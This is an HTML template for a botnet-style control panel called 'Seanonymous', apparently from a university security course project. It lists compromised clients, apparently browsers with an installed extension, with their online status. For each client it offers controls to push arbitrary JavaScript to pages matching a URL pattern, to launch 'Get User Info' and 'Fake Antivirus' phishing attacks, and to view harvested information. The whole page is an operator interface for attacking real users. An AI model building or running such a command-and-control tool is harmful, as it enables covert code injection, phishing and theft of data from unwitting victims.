<!DOCTYPE html>
<html lang="en">
<head>
    <title>Seanonymous</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.1/css/bootstrap.css">
    <link rel="stylesheet" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap4.min.css">
    <link rel="stylesheet" href="https://cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css">

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.0.3/socket.io.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
    <script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
    <script src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap4.min.js"></script>

    <script>
        $(document).ready(function () {

            var table = $('#example').DataTable({

                "order": [[1, 'desc']],
                "stateSave" : true,
                "columnDefs": [
                    {"searchable": false, "targets": [1,2,3,4,5]},
                    {"orderable": false, "targets": [2,3,4,5]}
                ]

            });

            table.on('draw', function () {
                table.rows().every(function (index) {
                    var id = $('#example').find('.name' + (index + 1)).attr('id');
                    var b = "childRow" + id;
                    var stuff = "";

                    this
                        .child(
                            $(
                                '<tr class="col-md-12" id="moreinfo' + id + '">' +
                                '<td colspan="6" class="' + b + ' collapse" ' + 'id=' + b + '>' + id + '</td>' +
                                '</tr>'
                            )
                        ).show();
                });
                $(this).find("a[id*='viewinfo']").each(function(){
                    this.text = 'View Info';
                })
            });


            table.rows().every(function (index) {
                var id = $('#example').find('.name' + (index + 1)).attr('id');
                var b = "childRow" + id;

                this
                    .child(
                        $(
                            '<tr class="col-md-12" id="moreinfo' + id + '">' +
                            '<td colspan="6" class="' + b + ' collapse" ' + 'id=' + b + '>' + id + '</td>' +
                            '</tr>'
                        )
                    ).show();
            });


            var socket = io.connect("https://cse331.andrewjaffie.me/socket.io");

            socket.on('disconnectSuccessful', function (id) {
                var fullid = "status" + id;
                var element = document.getElementById(fullid);
                element.style.backgroundColor = "red";
                element.innerHTML = "Offline";
            });
            socket.on('connect', function (id) {
                console.log("web app connected to server")
            });
            socket.on('disconnect', function (id) {
                console.log("web app disconnected from server")
            });
            socket.on('connectSuccessful', function (id) {
                var fullid = "status" + id;
                var element = document.getElementById(fullid);
                element.style.backgroundColor = "green";
                element.innerHTML = "Online"
            });

            socket.on('pingSuccessful', function (id) {
                get_info_display_same_page(id, 'false');
            });


            socket.on('newClientInstall', function (id) {
                console.log(id);
                var rowInfo = '<tr id="row' + id + '" class="userrow" style="background-color: transparent">';
                var idName = '<td class="text-center rowtext" style="background-color: transparent">' +
                        '<button class="transparentbutton" id="clientid"' +
                        'onclick="get_info_display_new_tab(' + id + ')">'
                        + '<u class="name' + (table.rows().count() + 1) + '" id="' + id + '">' + id  + '</u></button>' +
                        '</td>';
                var status = '<td class="text-center rowtext" id="status' + id + '"style="background-color: green;'
                    + '">Online </td>';

                var url = '<td><input id="pattern' + id + '" type="text" class="form-control"' +
                    'aria-label="Text input with segmented dropdown button"></td>';

                var js_input = '<td class="text-center"> <form class="input-group">' +
                    '<input id="input' + id + '" type="text" class="form-control"' +
                    'aria-label="Text input with segmented dropdown button">' +
                    '<div class="input-group-append    ">' +
                    '<button type="reset" class="btn btn-outline-secondary buttontext"' +
                    'onclick="call_javascript(' + id + ')">Execute' +
                    '</button> </div> </form> </td>';

                var phish_buttons = '<td class="text-center">' +
                    '<div class="btn-group" role="group" aria-label="Basic example">' +
                    '<button type="button" class="btn btn-outline-secondary buttontext"' +
                    'onclick="call_phishing(' + id + ',1)">Get User Info</button>' +
                    '<button type="button" class="btn btn-outline-secondary buttontext"' +
                    'onclick="call_phishing(' + id + ',2)">Phish #2</button></div></td>';

                var infobutton = '<td><a id="viewinfo' + id + '" class="btn btn-primary" data-toggle="collapse"'
                    + 'role="button" aria-expanded="false" aria-controls="collapse' + id + '"' +
                    'onclick="get_info_display_same_page(' + id + ')">Fake Antivirus</a></td>';


                var childrowid = "childRow" + id;

                table.row.add($(rowInfo +
                    idName +
                    status +
                    url +
                    js_input +
                    phish_buttons +
                    infobutton +
                    '</tr>')[0]
                ).child(
                    $(
                        '<tr class="col-md-12" id="moreinfo' + id + '">' +
                        '<td colspan="6" class="' + childrowid + ' collapse" ' + 'id=' + childrowid + '>' + id + '</td>' +
                        '</tr>'
                    )
                ).show().draw(false);

            });

            socket.on('clientUninstall', function (id) {
                var toRemove = '#row' + id;
                table.row(toRemove).remove().draw(false);
            })
        });

    </script>
</head>
<body id="doc"
      style="background-image: url('https://mdbootstrap.com/img/Photos/Others/background.jpg'); background-size: auto; background-position: center center;">

<div class="text-center alert alert-success success" style="display:none">
    <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
    <strong id="success-message">Success!</strong>
</div>

<div>
    <h1 class="text-center display-3 title" style="margin-top:2%">Welcome, Seanonymous!</h1>
    <h4 class="text-center display-4 subtitle">Attack at your will.</h4>
    <form class = "text-center">
	    <button class="text-right btn btn-outline-secondary buttontext" id = "blackList" a href="blacklist.html" onclick = "open_blacklist_window_new_tab()">Blacklisted Websites</button>
    </form>
    <form class="text-center" action="{{ (url_for('logout', next = request.endpoint)) }}" method="post">
        <button class="text-center btn btn-outline-secondary buttontext">Log Out</button>
    </form>
</div>

<table id="example" class="table table-responsive" style="width: 100%">
    <thead class="thead-dark">
    <tr id="heading">
        <th class="text-center"><u>ID</u></th>
        <th class="text-center">Status</th>
        <th class="text-center">URL/Pattern</th>
        <th class="text-center">JS Attack</th>
        <th class="text-center">Phishing Attack</th>
        <th class="text-center viewinfo"></th>
    </tr>
    </thead>
    <tbody>
    {% for item in data %}
        <tr id="row{{ item[0] }}" class="userrow" style="background-color: transparent">
            {% if item[5] is not equalto '' %}
                <td class="text-center rowtext" style="background-color: transparent">
                    <button class="transparentbutton" id="clientid"
                            onclick="get_info_display_new_tab({{ item[0] }})">
                        <u id="{{ item[0] }}" class="name{{ loop.index }}">{{ item[5] }}</u></button>
                </td>
            {% else %}
                <td class="text-center rowtext" style="background-color: transparent">
                    <button class="transparentbutton" id="clientid"
                            onclick="get_info_display_new_tab({{ item[0] }})">
                        <u id="{{ item[0] }}" class="name{{ loop.index }}">{{ item[0] }}</u></button>
                </td>
            {% endif %}

            {% if active_users.__contains__(item[0]|string) %}
                <td class="text-center rowtext" id="status{{ item[0] }}" style="background-color: green; ">Online
                </td>
            {% else %}
                <td class="text-center rowtext" id="status{{ item[0] }}" style="background-color: red">
                    Offline
                </td>
            {% endif %}

            <td><input id="pattern{{ item[0] }}" type="text" class="form-control"
                       aria-label="Text input with segmented dropdown button"></td>
            <td class="text-center">
                <form class="input-group">
                    <input id="input{{ item[0] }}" type="text" class="form-control"
                           aria-label="Text input with segmented dropdown button">
                    <div class="input-group-append    ">
                        <button type="reset" class="btn btn-outline-secondary buttontext"
                                onclick="call_javascript({{ item[0] }})">Execute
                        </button>
                    </div>
                </form>
            </td>
            <td class="text-center">
                <div class="btn-group" role="group" aria-label="Basic example">
                    <button type="button" class="btn btn-outline-secondary buttontext"
                            onclick="call_phishing({{ item[0] }},1)">Get User Info
                    </button>
                    <button type="button" class="btn btn-outline-secondary buttontext"
                            onclick="call_phishing({{ item[0] }},2)">Fake Antivirus
                    </button>
                </div>
            </td>
            <td><a id="viewinfo{{ item[0] }}" class="btn btn-primary" data-toggle="collapse"
                   role="button"
                   aria-expanded="false" aria-controls="collapse{{ item[0] }}"
                   onclick="get_info_display_same_page({{ item[0] }})">
                View Info
            </a></td>

        </tr>
    {% endfor %}
    </tbody>
</table>
<script>
    function call_javascript(person) {
        document.getElementById("success-message").innerHTML = "JS Attack on " + person + " sent!";
        $('.success').fadeIn().delay(2000).fadeOut();

        $.ajax({
            url: "/sendjs",
            type: "post",
            data: {
                id: person,
                js: document.getElementById("input"+person).value,
                pattern: document.getElementById("pattern" + person).value
            },
            success: function (response) {
                console.log(response);
            },
            error: function (error) {
                console.log(error)
            }
        });
        document.getElementById("pattern" + person).value = "";
    }

    function call_phishing(id, attackNumber) {
        var a = {1: "User Info Phishing Attack on User #", 2: "Fake Antivirus Phishing Attack on User #"}
        document.getElementById("success-message").innerHTML = a[attackNumber] + id + " sent!";
        $('.success').fadeIn().delay(500).fadeOut();
        $.ajax({
            url: "/phish",
            type: "post",
            data: {
                id: id,
                number: attackNumber,
                pattern: document.getElementById("pattern" + id).value
            },
            success: function (response) {
                console.log(response);
            },
            error: function (error) {
                console.log(error)
            }
        });
        document.getElementById("pattern" + id).value = "";


    }

    function submitFormIDMappings(url, mappings){
        var clientid = mappings[0].id
        mappings = JSON.stringify(mappings);
        console.log(mappings);
        $.ajax({
            url: "/sendFormIDMappings",
            type: "post",
            data: {
                url_for_mapping:url,
                mappings: mappings
            },
            success: function (response) {
                console.log(response)
            },
            error: function (error) {
                console.log(error)
            }
        });

        get_info_display_same_page(clientid, 'false')
    }
    function open_blacklist_window_new_tab() {
	var blacklist_page = window.open()
    }
    function get_info_display_new_tab(person) {
        $.ajax({
            url: "/getinfo",
            type: "post",
            data: {
                id: person,
                fullbh: 'true',
            },
            success: function (response) {
                console.log('success')
                var new_page = window.open();
                new_page.document.write(response)
                new_page.document.title = person
            },
            error: function (error) {
                console.log(error)
            }
        });
    }

    function get_info_display_same_page(person, open) {
        var childRow = document.getElementById('childRow' + person);
        var viewinfo = document.getElementById('viewinfo' + person);
        if (open != 'false') {
            if (childRow.classList.contains('collapse')) {
                viewinfo.text = 'Less Info'
                childRow.classList.remove('collapse');
                $.ajax({
                    url: "/getinfo",
                    type: "post",
                    data: {
                        id: person,
                        fullbh: 'false',
                    },
                    success: function (response) {
                        console.log('success')
                        var a = "collapse" + person;

                        childRow.innerHTML =  response;
                        ;
                    },
                    error: function (error) {
                        console.log(error)
                    }
                });
            } else {
                viewinfo.text = 'View Info'
                childRow.classList.add('collapse')
            }
        } else {
            $.ajax({
                url: "/getinfo",
                type: "post",
                data: {
                    id: person,
                    fullbh: 'false',
                },
                success: function (response) {
                    console.log('success')
                    var a = "collapse" + person;

                    childRow.innerHTML = response;
                },
                error: function (error) {
                    console.log(error)
                }
            });
        }

    }
</script>
<style>
    .rowtext {
        color: black;
        font-family: Arial;
        font-size: 18px;
        font-weight: bolder;
    }

    .buttontext {
        color: black;
        font-family: Arial;
    }

    .title {
        padding-top: 0;
    }

    .subtitle {
        padding-bottom: 1%;
    }

    .transparentbutton {
        background-color: transparent;
        outline: none;
        border: transparent;
    }

    .dataTables_wrapper {
        margin: 0 auto;
        width: 60%;
    }



    .btn-group {
        position: center;
    }

    td, button {
        text-align: center;
    }

    .userrow {
        background-color: transparent;
    }


</style>
</body>
</html>
